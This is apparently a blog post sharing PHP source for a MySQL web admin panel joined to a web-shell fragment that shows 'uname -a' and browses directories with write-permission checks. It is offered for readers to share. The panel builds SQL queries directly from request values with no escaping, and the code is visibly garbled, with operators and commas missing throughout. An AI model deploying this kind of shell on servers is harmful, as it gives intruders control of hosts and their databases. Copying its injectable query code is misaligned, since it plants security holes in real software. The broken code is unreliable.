        $fieldtype $field["Type"];
        $len mysql_field_len$pResultLen$i );

        echo "<tr>";
        echo "<td>$fieldname</td>";
        echo "<td>".$field["Type"]."</td>";
        echo "<td>\n";
        echo "<select name=${fieldname}_function>\n";
        echo "<option>\n";
        echo "<option>ASCII\n";
        echo "<option>CHAR\n";
        echo "<option>SOUNDEX\n";
        echo "<option>CURDATE\n";
        echo "<option>CURTIME\n";
        echo "<option>FROM_DAYS\n";
        echo "<option>FROM_UNIXTIME\n";
        echo "<option>NOW\n";
        echo "<option>PASSWORD\n";
        echo "<option>PERIOD_ADD\n";
        echo "<option>PERIOD_DIFF\n";
        echo "<option>TO_DAYS\n";
        echo "<option>USER\n";
        echo "<option>WEEKDAY\n";
        echo "<option>RAND\n";
        echo "</select>\n";
        echo "</td>\n";
        $value htmlspecialchars($data[$i]);
        if( $cmd == "add" ) {
            $type strtok$fieldtype" (,)\n" );
            if( $type == "enum" || $type == "set" ) {
                echo "<td>\n";
                if( $type == "enum" )
                    echo "<select name=$fieldname>\n";
                else if( $type == "set" )
                    echo "<select name=$fieldname size=4 multiple>\n";
                while( $str strtok"'" ) ) {
                    echo "<option>$str\n";
                    strtok"'" );
                }
                echo "</select>\n";
                echo "</td>\n";
            } else {
                if( $len 40 )
                    echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
                else
                    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
            }
        } else if( $cmd == "edit" ) {
            $type strtok$fieldtype" (,)\n" );
            if( $type == "enum" || $type == "set" ) {
                echo "<td>\n";
                if( $type == "enum" )
                    echo "<select name=$fieldname>\n";
                else if( $type == "set" )
                    echo "<select name=$fieldname size=4 multiple>\n";
                while( $str strtok"'" ) ) {
                    if( $value == $str )
                        echo "<option selected>$str\n";
                    else
                        echo "<option>$str\n";
                    strtok"'" );
                }
                echo "</select>\n";
                echo "</td>\n";
            } else {
                if( $len 40 )
                    echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
                else
                    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
            }
        }
        echo "</tr>";
    }
    echo "</table><p>\n";
    if( $cmd == "add" )
        echo "<input type=submit value='Add Data'>\n";
    else if( $cmd == "edit" )
        echo "<input type=submit value='Edit Data'>\n";
    echo "<input type=button value='Cancel' onClick='history.back()'>\n";
    echo "</form>\n";
}

function manageData_submit$cmd ) {
    global $mysqlHandle$dbname$tablename$fieldname$PHP_SELF$queryStr$errMsg;

    $pResult mysql_list_fields$dbname$tablename );
    $num mysql_num_fields$pResult );

    mysql_select_db$dbname$mysqlHandle );
    if( $cmd == "add" )
        $queryStr "INSERT INTO $tablename VALUES (";
    else if( $cmd == "edit" )
        $queryStr "REPLACE INTO $tablename VALUES (";
    for( $i 0$i $num-1$i++ ) {
        $field mysql_fetch_field$pResult );
        $func $GLOBALS[$field->name."_function"];
        if( $func != "" )
            $queryStr .= $func(";
        if( $field->numeric == ) {
            $queryStr .= $GLOBALS[$field->name];
            if( $func != "" )
                $queryStr .= "),";
            else
                $queryStr .= ",";
        } else {
            $queryStr .= "'" $GLOBALS[$field->name];
            if( $func != "" )
                $queryStr .= "'),";
            else
                $queryStr .= "',";
        }
    }
    $field mysql_fetch_field$pResult );
    if( $field->numeric == )
        $queryStr .= $GLOBALS[$field->name] . ")";
    else
        $queryStr .= "'" $GLOBALS[$field->name] . "')";

    mysql_query$queryStr $mysqlHandle );
    $errMsg mysql_error();

    viewData"" );
}

function deleteData() {
    global $mysqlHandle$dbname$tablename$fieldname$PHP_SELF$queryStr$errMsg;

    $pResult mysql_list_fields$dbname$tablename );
    $num mysql_num_fields$pResult );

    $key "";
    for( $i 0$i $num$i++ ) {
        $field mysql_fetch_field$pResult$i );
        if( $field->primary_key == )
            if( $field->numeric == )
                $key .= $field->name "=" $GLOBALS[$field->name] . " AND ";
            else
                $key .= $field->name "='" $GLOBALS[$field->name] . "' AND ";
    }
    $key substr$key0strlen($key)-);

    mysql_select_db$dbname$mysqlHandle );
    $queryStr =  "DELETE FROM $tablename WHERE $key";
    mysql_query$queryStr$mysqlHandle );
    $errMsg mysql_error();

    viewData"" );
}

function fetch_table_dump_sql($table)
{
    global $mysqlHandle,$dbname;
   
    mysql_select_db$dbname$mysqlHandle );
    $query_id mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
    $tabledump mysql_fetch_array($query_idMYSQL_ASSOC);
    $tabledump "DROP TABLE IF EXISTS $table;\n" $tabledump['Create Table'] . ";\n\n";

    echo $tabledump;

    // get data
    $rows mysql_query("SELECT * FROM $table",$mysqlHandle);
    $numfields=mysql_num_fields($rows);
    while ($row mysql_fetch_array($rowsMYSQL_NUM))
    {
        $tabledump "INSERT INTO $table VALUES(";

        $fieldcounter = -1;
        $firstfield 1;
        // get each field's data
        while (++$fieldcounter $numfields)
        {
            if (!$firstfield)
            {
                $tabledump .= ', ';
            }
            else
            {
                $firstfield 0;
            }

            if (!isset($row["$fieldcounter"]))
            {
                $tabledump .= 'NULL';
            }
            else
            {
                $tabledump .= "'" mysql_escape_string($row["$fieldcounter"]) . "'";
            }
        }

        $tabledump .= ");\n";

        echo $tabledump;

    }
    @mysql_free_result($rows);
}

function dump() {
    global $mysqlHandle$action$dbname$tablename;

    if( $action == "dumpTable" ){

        header("Content-disposition: filename=$tablename.sql");
        header('Content-type: unknown/unknown');
        fetch_table_dump_sql($tablename);
        echo "\n\n\n";
        echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
        exit;       
               
    }else{
        header("Content-disposition: filename=$dbname.sql");
        header('Content-type: unknown/unknown');
       
        mysql_select_db$dbname$mysqlHandle );
        $query_id mysql_query("SHOW tables",$mysqlHandle);
        while ($row mysql_fetch_array($query_idMYSQL_NUM))
        {
                fetch_table_dump_sql($row[0]);
                echo "\n\n\n";
                echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
                echo "\n\n\n";
        }
        echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";
        exit;       

    }

}

function utils() {
    global $PHP_SELF$command;
    echo "<h1>Utilities</h1>\n";
    if( $command == "" || substr$command0) == "flush" ) {
        echo "<hr>\n";
        echo "Show\n";
        echo "<ul>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
        echo "</ul>\n";
        echo "Flush\n";
        echo "<ul>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
        if( $command == "flush_hosts" ) {
            if( mysql_query"Flush hosts" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
        if( $command == "flush_logs" ) {
            if( mysql_query"Flush logs" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
        if( $command == "flush_privileges" ) {
            if( mysql_query"Flush privileges" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
        if( $command == "flush_tables" ) {
            if( mysql_query"Flush tables" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
        if( $command == "flush_status" ) {
            if( mysql_query"Flush status" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "</ul>\n";
    } else {
        $queryStr ereg_replace"_"" "$command );
        $pResult mysql_query$queryStr );
        if( $pResult == false ) {
            echo "Fail";
            return;
        }
        $col mysql_num_fields$pResult );

        echo "<p class=location>$queryStr</p>\n";
        echo "<hr>\n";

        echo "<table cellspacing=1 cellpadding=2 border=0>\n";
        echo "<tr>\n";
        for( $i 0$i $col$i++ ) {
            $field mysql_fetch_field$pResult$i );
            echo "<th>".$field->name."</th>\n";
        }
        echo "</tr>\n";

        while( ) {
            $rowArray mysql_fetch_row$pResult );
            if( $rowArray == false ) break;
            echo "<tr>\n";
            for( $j 0$j $col$j++ )
                echo "<td>".htmlspecialchars$rowArray[$j] )."</td>\n";
            echo "</tr>\n";
        }
        echo "</table>\n";
    }
}

function header_html() {
    global $PHP_SELF;
   
echo '
<html>
<head>
<title>MySQL Interface</title>
<style type="text/css">
<!--
p.location {
    color: #11bb33;
    font-size: small;
}
h1 {
    color: #A4A260;
}
th {
    background-color: #BDBE42;
    color: #FFFFFF;
    font-size: x-small;
}
td {
    background-color: #DEDFA5;
    font-size: x-small;
}
form {
    margin-top: 0;
    margin-bottom: 0;
}
a {
    text-decoration:none;
    color: #848200;
    font-size:x-small;
}
a:link {
}
a:hover {
    background-color:#EEEFD5;
    color:#646200;
    text-decoration:none              
}
//-->
</style>
</head>
<body>
';
}

function footer_html() {
    global $mysqlHandle$dbname$tablename$PHP_SELF$USERNAME;

    echo "<hr>\n";
    echo "<font size=2 color=blue>[$USERNAME]</font> - \n";

    echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
    if( $tablename != "" )
        echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
    echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
    echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
    echo "</font>\n";
    echo "</body>\n";
    echo "</html>\n";
}



//------------- MAIN ------------- //error_reporting(0);ini_set ('display_errors'0);ini_set ('log_errors'0);

if( $action == "logon" || $action == "" || $action == "logout" )
    logon();
else if( $action == "logon_submit" )
    logon_submit();
else if( $action == "dumpTable" || $action == "dumpDB" ) {
    while( list($var$value) = each($HTTP_COOKIE_VARS) ) {
        if( $var == "mysql_web_admin_username" $USERNAME $value;
        if( $var == "mysql_web_admin_password" $PASSWORD $value;
        if( $var == "mysql_web_admin_hostname" $HOSTNAME $value;
    }
    $mysqlHandle mysql_pconnect$HOSTNAME$USERNAME$PASSWORD );
    dump();
} else {
    while( list($var$value) = each($HTTP_COOKIE_VARS) ) {
        if( $var == "mysql_web_admin_username" $USERNAME $value;
        if( $var == "mysql_web_admin_password" $PASSWORD $value;
        if( $var == "mysql_web_admin_hostname" $HOSTNAME $value;
    }
    echo "<!--";
    $mysqlHandle mysql_pconnect$HOSTNAME$USERNAME$PASSWORD );
    echo "-->";

    if( $mysqlHandle == false ) {
        echo "<html>\n";
        echo "<head>\n";
        echo "<title>MySQL Interface</title>\n";
        echo "</head>\n";
        echo "<body>\n";
        echo "<table width=100% height=100%><tr><td><center>\n";
        echo "<h1>Wrong Password!</h1>\n";
        echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
        echo "</center></td></tr></table>\n";
        echo "</body>\n";
        echo "</html>\n";
    } else {
        header_html();
        if( $action == "listDBs" )
            listDatabases();
        else if( $action == "createDB" )
            createDatabase();
        else if( $action == "dropDB" )
            dropDatabase();
        else if( $action == "listTables" )
            listTables();
        else if( $action == "createTable" )
            createTable();
        else if( $action == "dropTable" )
            dropTable();
        else if( $action == "viewSchema" )
            viewSchema();
        else if( $action == "query" )
            viewData$queryStr );
        else if( $action == "addField" )
            manageField"add" );
        else if( $action == "addField_submit" )
            manageField_submit"add" );
        else if( $action == "editField" )
            manageField"edit" );
        else if( $action == "editField_submit" )
            manageField_submit"edit" );
        else if( $action == "dropField" )
            dropField();
        else if( $action == "viewData" )
            viewData"" );
        else if( $action == "addData" )
            manageData"add" );
        else if( $action == "addData_submit" )
            manageData_submit"add" );
        else if( $action == "editData" )
            manageData"edit" );
        else if( $action == "editData_submit" )
            manageData_submit"edit" );
        else if( $action == "deleteData" )
            deleteData();
        else if( $action == "utils" )
            utils();

        mysql_close$mysqlHandle);
        footer_html();
    }
}?><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p>
<?php
$d str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d realpath(".");} elseif(realpath($d)) {$d realpath($d);} $d str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $d str_replace("\\\\","\\",$d); $dispd htmlspecialchars($d); $pd $e explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); $i 0;
foreach($pd as $b)
{
 $t "";
 $j 0;
 foreach ($e as $r)
 {
  $t.= $r.DIRECTORY_SEPARATOR;
  if ($j == $i) {break;}
  $j++;
 }
 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
 $i++;
}
echo "&nbsp;&nbsp;&nbsp;";
if (is_writable($d))
{
 $wd TRUE;
 $wdt "<font color=green>[ ok ]</font>";
 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
?>
ThankxXx Plz leave Comment And Share it  

Posted by Unknown at 13:42

Labels: , ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)